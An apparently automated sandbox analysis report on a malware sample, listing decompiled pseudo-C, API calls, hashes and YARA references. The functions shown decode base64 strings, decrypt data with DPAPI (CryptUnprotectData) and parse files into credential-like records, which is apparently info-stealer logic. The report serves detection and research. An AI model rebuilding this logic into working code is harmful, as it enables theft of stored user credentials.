Instruction ID: c0db6940fc296421d8ec9f19d8a0b4457489e2226d74dd05c4d5d63db709749a
Opcode Fuzzy Hash: 449887c1d3c8a9caf8a2e502b927a4b8bc71fb38d435b07fccc8b952fb49c7e0
Instruction Fuzzy Hash: 494146B1504209ABCB24DF94DC49EEB77BCBF88701F048599B60992190E778EB94CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406560, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0040804D,00000001,?,00001FA0,00000000,00000000,?,00001FA0), ref: 004065AB
CryptStringToBinaryA.CRYPT32(0040804D,00000000), ref: 004065B6
lstrcat.KERNEL32(?,00413042), ref: 00406679
lstrcat.KERNEL32(?,00413042), ref: 0040668D
lstrcat.KERNEL32(B0A,00413042), ref: 004066AE

Strings

B0A, xrefs: 004066B4, 004066A7, 004066AD

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$BinaryCryptStringlstrlen
String ID: B0A
API String ID: 189259977-1388496713
Opcode ID: f891bb7ffb90286a433d7d4f8b688da977bf51f382027fccf962fb9f0341c049
Instruction ID: 789935d42065f891ebccd7e5aa01d1e0aebefb7e10f83f24b8b8561c43a0af6c
Opcode Fuzzy Hash: f891bb7ffb90286a433d7d4f8b688da977bf51f382027fccf962fb9f0341c049
Instruction Fuzzy Hash: BA4150B490421A9FDB10DF94CC89BEEB7B8BB48700F1085B9E509A7280C7795B84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00406230, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406230(void* __ecx, char* _a4, void** _a8, char _a12) {
				int _v8;

				_v8 = 0;
				 *_a8 = 0;
				_t3 =  &_a12; // 0x4064e6
				 *( *_t3) = 0;
				_t4 =  &_a12; // 0x4064e6
				if(CryptStringToBinaryA(_a4, 0, 1, 0,  *_t4, 0, 0) != 0) {
					_t6 =  &_a12; // 0x4064e6
					 *_a8 = LocalAlloc(0x40,  *( *_t6));
					if( *_a8 != 0) {
						_t9 =  &_a12; // 0x4064e6
						_v8 = CryptStringToBinaryA(_a4, 0, 1,  *_a8,  *_t9, 0, 0);
						if(_v8 == 0) {
							 *_a8 = LocalFree( *_a8);
						}
					}
				}
				return _v8;
			}

0x00406234
0x0040623e
0x00406244
0x00406247
0x00406251
0x00406267
0x00406269
0x0040627a
0x00406282
0x00406288
0x004062a0
0x004062a7
0x004062b8
0x004062b8
0x004062a7
0x00406282
0x004062c0

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,d@,00000000,00000000), ref: 0040625F
LocalAlloc.KERNEL32(00000040,?,?,004064E6,?,?), ref: 00406271
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,d@,00000000,00000000), ref: 0040629A
LocalFree.KERNEL32(?,?,?,004064E6,?,?), ref: 004062AF

Strings

d@, xrefs: 00406244, 00406251, 00406269, 00406288, 00406254, 0040628B

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: d@
API String ID: 4291131564-2474408879
Opcode ID: 589cfcc1ed8b10e79127f6d7afa089017ca11ff486a22fa04c38961a1437a2ea
Instruction ID: 37152b5fcbc4b75789d39c59710300d39fcc4fdbaf6208ec85a8db76a5091f55
Opcode Fuzzy Hash: 589cfcc1ed8b10e79127f6d7afa089017ca11ff486a22fa04c38961a1437a2ea
Instruction Fuzzy Hash: 6A11A4B4241208AFEB10CF54CC95FAA77B9EB89714F208099F9159B3D0C775A941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00403BE0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403BE0(void* __ecx, void* __eflags, char* _a4) {
				int _v8;
				void _v20011;
				char _v20012;

				E00412560(0x4e28, __ecx);
				_v20012 = 0;
				memset( &_v20011, 0, 0x4e1f);
				_v8 = 0;
				CryptStringToBinaryA(_a4, E0040A290( &_v8, _a4), 1, 0,  &_v8, 0, 0);
				if(CryptStringToBinaryA(_a4, E0040A290( &_v8, _a4), 1,  &_v20012,  &_v8, 0, 0) == 0) {
					return "UNK";
				}
				return  &_v20012;
			}

0x00403be8
0x00403bed
0x00403c02
0x00403c0a
0x00403c2e
0x00403c5e
0x00000000
0x00403c6a
0x00000000

APIs

memset.MSVCRT ref: 00403C02
CryptStringToBinaryA.CRYPT32(?,00000000,00000000,?,?), ref: 00403C2E
CryptStringToBinaryA.CRYPT32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403C56

Strings

UNK, xrefs: 00403C6A

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: BinaryCryptString$memset
String ID: UNK
API String ID: 1505698593-448974810
Opcode ID: 75fc0801f12b4075ed516602dad5c05069b935afc9c44a615ddf083ca427fcb8
Instruction ID: 8131cd11e156fd09666396fe32e14bc0cbf12017fe991e8d98755ef0fa2f5e99
Opcode Fuzzy Hash: 75fc0801f12b4075ed516602dad5c05069b935afc9c44a615ddf083ca427fcb8
Instruction Fuzzy Hash: FB0184B6A4020876E710EB94DD46FDA377CAB44B04F1041A9B704EA1C1E6F5EB4487AD

Uniqueness

Uniqueness Score: -1.00%

Function 00410E40, Relevance: 3.1, APIs: 2, Instructions: 86
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410E40(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct _FILETIME _v12;
				signed short _v16;
				signed short _v20;
				struct _SYSTEMTIME _v36;
				intOrPtr _v40;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t86;
				intOrPtr _t88;
				long _t98;
				intOrPtr _t99;
				intOrPtr _t100;

				_v40 = __ecx;
				 *((intOrPtr*)(_v40 + 0x7c)) = 0;
				 *((intOrPtr*)(_v40 + 0x84)) = _a4;
				 *((char*)(_v40 + 0x80)) = 0;
				 *((intOrPtr*)(_v40 + 0x78)) = 0;
				 *((intOrPtr*)(_v40 + 0x74)) = 0;
				 *((intOrPtr*)(_v40 + 0x90)) = 0;
				 *((intOrPtr*)(_v40 + 0x74)) = 0;
				 *((intOrPtr*)(_v40 + 0x88)) = _a8;
				 *((intOrPtr*)(_v40 + 0x8c)) = 0;
				if(_a4 == 0 || _a8 == 0) {
					return 0x10000;
				} else {
					 *((intOrPtr*)(_v40 + 0x4c)) = 0x80000000;
					 *((intOrPtr*)(_v40 + 0x70)) = _a8;
					 *((char*)(_v40 + 0x6c)) = 1;
					GetLocalTime( &_v36);
					SystemTimeToFileTime( &_v36,  &_v12);
					E00410210(_v12.dwLowDateTime, _v12.dwHighDateTime,  &_v20,  &_v16);
					_t98 = _v12.dwLowDateTime;
					_t70 = E004101D0(_t98, _v12.dwHighDateTime);
					_t86 = _v40;
					 *((intOrPtr*)(_t86 + 0x50)) = _t70;
					 *(_t86 + 0x54) = _t98;
					_t99 = _v40;
					_t71 = _v40;
					 *((intOrPtr*)(_t99 + 0x58)) =  *((intOrPtr*)(_t71 + 0x50));
					 *((intOrPtr*)(_t99 + 0x5c)) =  *((intOrPtr*)(_t71 + 0x54));
					_t88 = _v40;
					_t100 = _v40;
					 *((intOrPtr*)(_t88 + 0x60)) =  *((intOrPtr*)(_t100 + 0x50));
					 *((intOrPtr*)(_t88 + 0x64)) =  *((intOrPtr*)(_t100 + 0x54));
					 *(_v40 + 0x68) = _v16 & 0x0000ffff | (_v20 & 0x0000ffff) << 0x00000010;
					return 0;
				}
			}

0x00410e46
0x00410e4c
0x00410e59
0x00410e62
0x00410e6c
0x00410e76
0x00410e80
0x00410e8d
0x00410e9a
0x00410ea3
0x00410eb1
0x00000000
0x00410ec3
0x00410ec6
0x00410ed3
0x00410ed9
0x00410ee1
0x00410eef
0x00410f05
0x00410f11
0x00410f15
0x00410f1d
0x00410f20
0x00410f23
0x00410f26
0x00410f29
0x00410f2f
0x00410f35
0x00410f38
0x00410f3b
0x00410f41
0x00410f47
0x00410f5a
0x00000000
0x00410f5d

APIs

GetLocalTime.KERNEL32(?,?,?,?,?,0041169C,?), ref: 00410EE1
SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,0041169C,?), ref: 00410EEF

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Time$FileLocalSystem
String ID:
API String ID: 704252544-0
Opcode ID: 5b2e36ce61f25f3539e994385992b7d210123a6d392cf78b3afaadbff23d01f4
Instruction ID: d12a4cea763bea4f3be63a7d95f21d6bf8145184181e5728a1bf8e4d66736852
Opcode Fuzzy Hash: 5b2e36ce61f25f3539e994385992b7d210123a6d392cf78b3afaadbff23d01f4
Instruction Fuzzy Hash: 1E41A4749002099FDB04CF94C594BDEBBF5BB4C304F208599E815AB351D776AE85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00405F50, Relevance: 1.6, APIs: 1, Instructions: 60
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00405F50(intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;

				_v8 = E0040A1F0(_a8);
				E0040A210(_v8, _a4, _a8);
				_v12 = _a4;
				_v16 = _a8;
				_v28 = E0040A1F0(_a8);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v16);
				if( *0x4178f8() == 0) {
					return 0;
				}
				_v32 = 0;
				while(_v32 < _v24) {
					 *((char*)(_v28 + _v32)) =  *((intOrPtr*)(_v20 + _v32));
					_v32 = _v32 + 1;
				}
				 *((char*)(_v28 + _v24)) = 0;
				return _v28;
			}

0x00405f62
0x00405f71
0x00405f79
0x00405f7f
0x00405f8e
0x00405f94
0x00405f95
0x00405f97
0x00405f99
0x00405f9b
0x00405f9d
0x00405fa2
0x00405fab
0x00000000
0x00405fe9
0x00405fad
0x00405fbf
0x00405fd5
0x00405fbc
0x00405fbc
0x00405fdf
0x00000000

APIs

Part of subcall function 0040A1F0: GetProcessHeap.KERNEL32(00000008,00403A57,?,0040A0ED,00403A57,?,?,00403A57,-00000001), ref: 0040A1F9
Part of subcall function 0040A1F0: RtlAllocateHeap.NTDLL(00000000,?,0040A0ED), ref: 0040A200

CryptUnprotectData.CRYPT32(00000003,00000000,00000000,00000000,00000000,00000000,?), ref: 00405FA3

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateCryptDataProcessUnprotect
String ID:
API String ID: 976466151-0
Opcode ID: ef8e88e3a9ea2261abf50c31e4140dec4f5c7a3ff46a453f962113371ceebb9f
Instruction ID: 1626a7a44bd59920f3839c559ef3efee12158a713884bb16f0d30d2eeccde376
Opcode Fuzzy Hash: ef8e88e3a9ea2261abf50c31e4140dec4f5c7a3ff46a453f962113371ceebb9f
Instruction Fuzzy Hash: 60111FB5D0420ADFCF00DFD9C881AAFB7B5EF48304F148169E915AB341D638AA51DF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADE0, Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ADE0(void* __ecx) {
				intOrPtr _v8;

				_v8 = 0;
				_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				return _v8;
			}

0x0040ade4
0x0040adfe
0x0040ae07

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Uniqueness

Uniqueness Score: -1.00%

Function 00407D90, Relevance: 61.5, APIs: 34, Strings: 1, Instructions: 236
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00407D90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				intOrPtr _v12;
				char* _v16;
				char _v284;
				char* _v288;
				void* _v292;
				char* _v296;
				struct _OVERLAPPED* _v300;
				long _v304;
				char* _v308;
				intOrPtr _t59;
				char* _t72;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr _t96;
				char* _t98;
				char* _t99;
				intOrPtr _t104;
				intOrPtr _t108;
				char* _t110;
				char* _t111;
				intOrPtr _t116;
				void* _t118;
				intOrPtr _t120;
				char* _t129;
				char* _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				char* _t136;
				char* _t140;
				intOrPtr _t147;
				char* _t152;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t159;
				intOrPtr _t160;
				char* _t163;
				intOrPtr _t164;
				intOrPtr _t165;
				char* _t168;
				intOrPtr _t169;
				intOrPtr _t170;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;

				_t59 =  *0x41780c(_a12);
				_t174 = _t173 + 4;
				if(_t59 == 0) {
					_t59 = E0040A1A0(__ecx, 0x4177e0);
					_t175 = _t174 + 4;
					_v12 = _t59;
					if(_v12 < 0x20) {
						E0040A270( &_v284, 0x104);
						 *0x4179f8( &_v284, _a12);
						 *0x4179f8( &_v284, 0x413040);
						_t147 =  *0x4177d4; // 0xbbbd80
						 *0x4179f8( &_v284, _t147);
						_v304 = 0;
						_v300 = 0;
						_v292 = CreateFileA( &_v284, 0x80000000, 1, 0, 3, 0, 0);
						if(_v292 == 0) {
							L7:
							return  *0x417830();
						}
						SetFilePointer(_v292, 0, 0, 2);
						_v304 = GetFileSize(_v292, 0);
						SetFilePointer(_v292, 0, 0, 0);
						_t72 = E0040A0E0(_v292, _v304 + 1);
						_t176 = _t175 + 4;
						_v308 = _t72;
						_v16 = _v308;
						ReadFile(_v292, _v16, _v304,  &_v8, 0);
						while(1) {
							_t152 =  *0x417170; // 0xbbbd98
							_v296 = StrStrA(_v16, _t152);
							_t182 = _v296;
							if(_v296 == 0) {
								break;
							}
							_t129 =  *0x417170; // 0xbbbd98
							_t31 =  *0x4178e4(_t129) + 3; // 0x3
							_v296 =  &(_v296[_t31]);
							_t130 =  *0x4173ac; // 0xbbbaf8
							_v288 = StrStrA(_v296, _t130) - 3;
							 *_v288 = 0;
							_t131 =  *0x417330; // 0xbb2e40
							_t156 =  *0x417828; // 0x0
							 *0x4179f8(_t156, _t131);
							_t132 =  *0x417828; // 0x0
							 *0x4179f8(_t132, _a8);
							_t157 =  *0x417828; // 0x0
							 *0x4179f8(_t157, "\n");
							_t88 =  *0x417378; // 0xbb2de0
							_t133 =  *0x417828; // 0x0
							 *0x4179f8(_t133, _t88);
							_t90 =  *0x417828; // 0x0
							 *0x4179f8(_t90, _a4);
							_t134 =  *0x417828; // 0x0
							 *0x4179f8(_t134, "\n");
							_t159 =  *0x417144; // 0xbb2e50
							_t93 =  *0x417828; // 0x0
							 *0x4179f8(_t93, _t159);
							_t160 =  *0x417828; // 0x0
							 *0x4179f8(_t160, _v296);
							_t96 =  *0x417828; // 0x0
							 *0x4179f8(_t96, "\n");
							_t136 =  *0x4175ac; // 0xbb9630
							_t98 = StrStrA(_v288 + 1, _t136);
							_t99 =  *0x4175ac; // 0xbb9630
							_t41 =  *0x4178e4(_t99) + 3; // 0x3
							_v296 =  &(_t98[_t41]);
							_t163 =  *0x4175a8; // 0xbb9670
							_v288 = StrStrA(_v296, _t163) - 3;
							 *_v288 = 0;
							_t164 =  *0x41706c; // 0xbb2d70
							_t104 =  *0x417828; // 0x0
							 *0x4179f8(_t104, _t164);
							_t165 =  *0x417828; // 0x0
							 *0x4179f8(_t165, E00406560(_v296, _t182, _v296));
							_t108 =  *0x417828; // 0x0
							 *0x4179f8(_t108, "\n");
							_t140 =  *0x4175a8; // 0xbb9670
							_t110 = StrStrA(_v288 + 1, _t140);
							_t111 =  *0x4175a8; // 0xbb9670
							_t49 =  *0x4178e4(_t111) + 3; // 0x3
							_v296 =  &(_t110[_t49]);
							_t168 =  *0x4176fc; // 0xbb2d40
							_v288 = StrStrA(_v296, _t168) - 3;
							 *_v288 = 0;
							_t169 =  *0x41714c; // 0xbb2df0
							_t116 =  *0x417828; // 0x0
							 *0x4179f8(_t116, _t169);
							_t118 = E00406560(_v296, _t182, _v296);
							_t176 = _t176 + 8;
							_t170 =  *0x417828; // 0x0
							 *0x4179f8(_t170, _t118);
							_t120 =  *0x417828; // 0x0
							 *0x4179f8(_t120, "\n\n");
							_v16 = _v288 + 1;
						}
						CloseHandle(_v292);
						goto L7;
					}
				}
				return _t59;
			}

0x00407d9e
0x00407da4
0x00407da9
0x00407db4
0x00407db9
0x00407dbc
0x00407dc3
0x00407dd5
0x00407de5
0x00407df7
0x00407dfd
0x00407e0b
0x00407e11
0x00407e1b
0x00407e41
0x00407e4e
0x00408123
0x00000000
0x00408123
0x00407e61
0x00407e76
0x00407e89
0x00407e99
0x00407e9e
0x00407ea1
0x00407ead
0x00407ec8
0x00407ece
0x00407ece
0x00407edf
0x00407ee5
0x00407eec
0x00000000
0x00000000
0x00407ef2
0x00407f05
0x00407f09
0x00407f0f
0x00407f26
0x00407f32
0x00407f35
0x00407f3c
0x00407f43
0x00407f4d
0x00407f54
0x00407f5f
0x00407f66
0x00407f6c
0x00407f72
0x00407f79
0x00407f83
0x00407f89
0x00407f94
0x00407f9b
0x00407fa1
0x00407fa8
0x00407fae
0x00407fbb
0x00407fc2
0x00407fcd
0x00407fd3
0x00407fd9
0x00407fea
0x00407ff2
0x00407ffe
0x00408002
0x00408008
0x0040801f
0x0040802b
0x0040802e
0x00408035
0x0040803b
0x00408051
0x00408058
0x00408063
0x00408069
0x0040806f
0x00408080
0x00408088
0x00408094
0x00408098
0x0040809e
0x004080b5
0x004080c1
0x004080c4
0x004080cb
0x004080d1
0x004080de
0x004080e3
0x004080e7
0x004080ee
0x004080f9
0x004080ff
0x0040810e
0x0040810e
0x0040811d
0x00000000
0x0040811d
0x00407dc3
0x0040812d

APIs

lstrcat.KERNEL32(?,00BAE778), ref: 00407DE5
lstrcat.KERNEL32(?,00413040), ref: 00407DF7
lstrcat.KERNEL32(?,00BBBD80), ref: 00407E0B
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00407E3B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00407E61
GetFileSize.KERNEL32(00000000,00000000), ref: 00407E70
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00407E89
new[].LIBCMTD ref: 00407E99
ReadFile.KERNEL32(00000000,?,00000000,00409388,00000000), ref: 00407EC8
StrStrA.SHLWAPI(?,00BBBD98), ref: 00407ED9
lstrlen.KERNEL32(00BBBD98), ref: 00407EF9
StrStrA.SHLWAPI(00000000,00BBBAF8), ref: 00407F1D
lstrcat.KERNEL32(00000000,00BB2E40), ref: 00407F43
lstrcat.KERNEL32(00000000,?), ref: 00407F54
lstrcat.KERNEL32(00000000,004165A0), ref: 00407F66
lstrcat.KERNEL32(00000000,00BB2DE0), ref: 00407F79
lstrcat.KERNEL32(00000000,00000020), ref: 00407F89
lstrcat.KERNEL32(00000000,004165A0), ref: 00407F9B
lstrcat.KERNEL32(00000000,00BB2E50), ref: 00407FAE
lstrcat.KERNEL32(00000000,00000000), ref: 00407FC2
lstrcat.KERNEL32(00000000,004165A0), ref: 00407FD3
StrStrA.SHLWAPI(?,00BB9630), ref: 00407FEA
lstrlen.KERNEL32(00BB9630), ref: 00407FF8
StrStrA.SHLWAPI(00000000,00BB9670), ref: 00408016
lstrcat.KERNEL32(00000000,00BB2D70), ref: 0040803B

Part of subcall function 00406560: lstrlen.KERNEL32(0040804D,00000001,?,00001FA0,00000000,00000000,?,00001FA0), ref: 004065AB
Part of subcall function 00406560: CryptStringToBinaryA.CRYPT32(0040804D,00000000), ref: 004065B6

lstrcat.KERNEL32(00000000,00000000), ref: 00408058
lstrcat.KERNEL32(00000000,004165A0), ref: 00408069
StrStrA.SHLWAPI(?,00BB9670), ref: 00408080
lstrlen.KERNEL32(00BB9670), ref: 0040808E
StrStrA.SHLWAPI(00000000,00BB2D40), ref: 004080AC
lstrcat.KERNEL32(00000000,00BB2DF0), ref: 004080D1

Part of subcall function 00406560: lstrcat.KERNEL32(?,00413042), ref: 00406679
Part of subcall function 00406560: lstrcat.KERNEL32(?,00413042), ref: 0040668D
Part of subcall function 00406560: lstrcat.KERNEL32(B0A,00413042), ref: 004066AE

lstrcat.KERNEL32(00000000,00000000), ref: 004080EE
lstrcat.KERNEL32(00000000,0041659C), ref: 004080FF
CloseHandle.KERNEL32(00000000), ref: 0040811D

Strings

, xrefs: 00407DBF

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$File$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringnew[]
String ID:
API String ID: 3141130001-3916222277
Opcode ID: ad5733d5a9a3db059523e6f1e328da314b404acea24bd461c81f4cf71d7a4265
Instruction ID: cef898d8b9a2e4db646ec138f142b983031bef608e1666277443af893a12e918
Opcode Fuzzy Hash: ad5733d5a9a3db059523e6f1e328da314b404acea24bd461c81f4cf71d7a4265
Instruction Fuzzy Hash: 7EA13AB5964214AFDB14DFA4EC88FDA7BB9EB4C301F00C1A8F60997250D735A981CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00407930, Relevance: 33.3, APIs: 22, Instructions: 284stringmemoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040795F
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004079AC
RtlAllocateHeap.NTDLL(00000000), ref: 004079B3
lstrcat.KERNEL32(?,00BB2CA0), ref: 00407B1A
lstrcat.KERNEL32(?,00BB2D10), ref: 00407B40
lstrcat.KERNEL32(?,00BB2CA0), ref: 00407BF8
lstrcat.KERNEL32(?,00BB2D10), ref: 00407C1E
lstrcat.KERNEL32(?,?), ref: 00407C32
lstrcat.KERNEL32(?,00416BB4), ref: 00407C44
lstrcat.KERNEL32(?,?), ref: 00407C58
lstrcat.KERNEL32(?,00416BB4), ref: 00407C6A
lstrcat.KERNEL32(?,?), ref: 00407C7E
lstrcat.KERNEL32(?,00416BB4), ref: 00407C90
lstrcat.KERNEL32(?,?), ref: 00407CA4
lstrcat.KERNEL32(?,00416BB4), ref: 00407CB6
lstrcat.KERNEL32(?,?), ref: 00407CCA
lstrcat.KERNEL32(?,00416BB4), ref: 00407CDC
lstrcat.KERNEL32(?,?), ref: 00407CF0
lstrcat.KERNEL32(?,00416BB4), ref: 00407D02
lstrcat.KERNEL32(?,?), ref: 00407D16
lstrcat.KERNEL32(?,004165A0), ref: 00407D28
lstrlen.KERNEL32(?), ref: 00407D3A

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$Heap$AllocateProcesslstrlenwsprintf
String ID:
API String ID: 3196222039-0
Opcode ID: 0ef45eea54bb53269a7b9603ac161d7ee7a6cbc07566216225e768682be14b0f
Instruction ID: f3b7b0c6c9fd206335bffc28373684cf89f5c73b33dc0ef301e20b27a4fe56a2
Opcode Fuzzy Hash: 0ef45eea54bb53269a7b9603ac161d7ee7a6cbc07566216225e768682be14b0f
Instruction Fuzzy Hash: 39C12FB1E04218AFDB24DF64DC89FDA7B75AF48704F0085E9F609A7290C635AE84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00405942, Relevance: 28.7, APIs: 19, Instructions: 164stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 004059B8
lstrlen.KERNEL32(?), ref: 004059C5
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 004059F4
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00405A1D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00405A46
lstrcat.KERNEL32(00000000,00BB2E40), ref: 00405A63
lstrcat.KERNEL32(00000000,?), ref: 00405A77
lstrcat.KERNEL32(00000000,004165A0), ref: 00405A88
lstrcat.KERNEL32(00000000,00BB2CE0), ref: 00405A9C
lstrcat.KERNEL32(00000000,004165A0), ref: 00405AAD
lstrcat.KERNEL32(00000000,00BB2E50), ref: 00405AC1
lstrcat.KERNEL32(00000000,?), ref: 00405AD5
lstrcat.KERNEL32(00000000,004165A0), ref: 00405AE7
lstrcat.KERNEL32(00000000,00BB2D70), ref: 00405AFA
lstrcat.KERNEL32(00000000,?), ref: 00405B0D
lstrcat.KERNEL32(00000000,004165A0), ref: 00405B1F
lstrcat.KERNEL32(00000000,00BB2DF0), ref: 00405B32
lstrcat.KERNEL32(00000000,?), ref: 00405B7B
lstrcat.KERNEL32(00000000,00416B68), ref: 00405B8F
lstrcat.KERNEL32(00000000,0041659C), ref: 00405BA1
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00405C05
lstrlen.KERNEL32(?), ref: 00405C12
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00405C41
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00405C6A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 00405C93
lstrcat.KERNEL32(00000000,00BB2E40), ref: 00405CA7
lstrcat.KERNEL32(00000000,?), ref: 00405CBB
lstrcat.KERNEL32(00000000,004165A0), ref: 00405CCD
lstrcat.KERNEL32(00000000,00BB2CE0), ref: 00405CE0
lstrcat.KERNEL32(00000000,004165A0), ref: 00405CF2
lstrcat.KERNEL32(00000000,00BB2E50), ref: 00405D05
lstrcat.KERNEL32(00000000,?), ref: 00405D18
lstrcat.KERNEL32(00000000,004165A0), ref: 00405D2A
lstrcat.KERNEL32(00000000,00BB2D70), ref: 00405D3D
lstrcat.KERNEL32(00000000,?), ref: 00405D51
lstrcat.KERNEL32(00000000,004165A0), ref: 00405D62
lstrcat.KERNEL32(00000000,00BB2DF0), ref: 00405D76
lstrcat.KERNEL32(00000000,?), ref: 00405DC8
lstrcat.KERNEL32(00000000,00416B68), ref: 00405DDB
lstrcat.KERNEL32(00000000,0041659C), ref: 00405DED

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$ByteCharMultiWide$lstrlen
String ID:
API String ID: 1032782006-0
Opcode ID: 0e8d2a97fd3780259fd2b225af0b8bee399bc21e6e7ff6f499ad098fa36164b4
Instruction ID: 116786f4eca9932976ceb3f727a4702a1e7d479d5168e01efe9ba1090ca96bf2
Opcode Fuzzy Hash: 0e8d2a97fd3780259fd2b225af0b8bee399bc21e6e7ff6f499ad098fa36164b4
Instruction Fuzzy Hash: F4619EB16A5214ABEB54DB54DC88FD67779EB4C701F108298F3099B2E0C774E980CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004044A0, Relevance: 22.7, APIs: 18, Instructions: 180
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004044A0(void* __ecx) {
				char _v268;
				char _v532;
				char _v796;
				char _v1060;
				char _v1324;
				char _v1588;
				intOrPtr _t45;
				intOrPtr _t50;
				intOrPtr _t55;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t70;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				intOrPtr _t103;
				intOrPtr _t105;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t111;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t130;

				E0040A270( &_v1324, 0x104);
				E0040A270( &_v268, 0x104);
				E0040A270( &_v796, 0x104);
				E0040A270( &_v1588, 0x104);
				E0040A270( &_v532, 0x104);
				E0040A270( &_v1060, 0x104);
				_t45 =  *0x417364; // 0xba5250
				 *0x4179f8( &_v1324, _t45);
				_t116 =  *0x4177b4; // 0xbac128
				 *0x4179f8( &_v1324, _t116);
				_t97 =  *0x41711c; // 0xba5070
				 *0x4179f8( &_v1324, _t97);
				_t50 =  *0x417364; // 0xba5250
				 *0x4179f8( &_v268, _t50);
				_t118 =  *0x4177b4; // 0xbac128
				 *0x4179f8( &_v268, _t118);
				_t99 =  *0x4173b0; // 0xba50b8
				 *0x4179f8( &_v268, _t99);
				_t55 =  *0x417364; // 0xba5250
				 *0x4179f8( &_v796, _t55);
